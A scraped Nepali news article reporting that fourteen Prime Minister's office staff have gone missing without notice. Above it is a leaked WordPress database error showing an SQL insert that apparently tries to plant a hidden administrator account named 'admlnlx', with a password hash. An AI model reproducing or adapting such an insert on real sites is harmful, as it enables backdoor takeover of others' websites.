WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlDe..8IgnthV1T5iYxhwfSMg9BohW.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 04:07:39', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २८
प्रधानमन्त्री तथा मन्त्रिपरिषदको कार्यालयबाट एकैपटक सहसचिव, उपसचिवदेखि ड्राइभरसहित गरि १४ जना कर्मचारी सम्पर्कविहीन भएका छन् । उनीहरु गत आइतबारदेखि कुनै जानकारीविना अनुपस्थित रहेको प्रधानमन्त्री कार्यालयले जनाएको छ ।
ठूलो संख्यामा जिम्मेवार तहका कर्मचारीहरु एकैपटक कार्यालयमा अनुपस्थित भएपछि प्रधानमन्त्री कार्यालयले उनीहरुबारे सूचना संकलन थालेको छ । प्रधानमन्त्री कार्यालय स्रोतका अनुसार यसरी अनुपस्थित हुने कर्मचारीहरुमा आर्थिक पूर्वाधार महाशाखा प्रमुख रामेश्वर दंगाल, सोही महाशाखाका उपसचिव तारानाथ अधिकारी, मुकेश रेग्मी र आर्थिक लेखा अधिकृत नारायणप्रसाद नेपाल लगायत छन् ।